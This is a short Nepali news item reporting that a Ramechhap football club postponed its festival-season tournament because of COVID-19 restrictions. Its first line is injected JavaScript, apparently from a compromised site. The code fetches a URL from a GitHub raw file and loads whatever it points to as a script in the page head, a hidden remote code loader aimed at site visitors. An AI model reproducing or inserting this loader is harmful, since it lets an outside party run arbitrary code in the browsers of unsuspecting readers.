;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज १४,
रामेछाप । दिपशिख व्वाईज यूनाईटेड क्लबले आफ्नो खेल स्थगीत गरेको छ । विगतका वर्षहरुमा जस्तै यो वर्ष पनि वडा दशै तथा शुभदिपावालि, छठ पर्वको अवसरमा आयोजना गर्दै आएको फुटबल खेल खेलाउने तयारी गरेको भए पनि नेपाल सरकार र जिल्ला प्रशासन कार्यालय रामेछापले कोरोना भाइरस संक्रमण, नियन्त्रण गर्नको लागि जारी अघोषित निषेधाज्ञा जारी गरेकाले खेल खेलाउनको लागि सम्भव नभएको भन्दै तयारी गरि रहेको खेल स्थगित गरिएको क्लवका उपाअध्यक्ष दिपेश कार्कीले जुनेली न्युजलाई जानकारी दिए ।
खेल यहि असोज २७ गतेदेखि कार्तिक ५ गते सम्म खेलाउने पूर्व तयारी गरिएको थियो । जिल्ला र देशैभरिमा कोरोना भाइसर संक्रमण दिन प्रतिदिन बढ्दै गएको विषयलाई ध्यानमा राखि खेल खेलाउन, भिड्भाड गर्ने कार्यक्रम हुने कुनै पनि कार्य नगर्न प्रशासनले भनेको छ । सोही निर्णयलाई पालन गर्दै खेल स्थगित गरेको कार्कीले बताए । जारी अघोषित बन्दाबन्दीले खेल आयोजनाको लागि क्लवको आन्तरिक तयारीमा समेत असर परेको क्लबले मंगलबार विज्ञप्ति जारी गरी जानकारी दिएको छ ।
फेसबुक प्रतिक्रियाहरु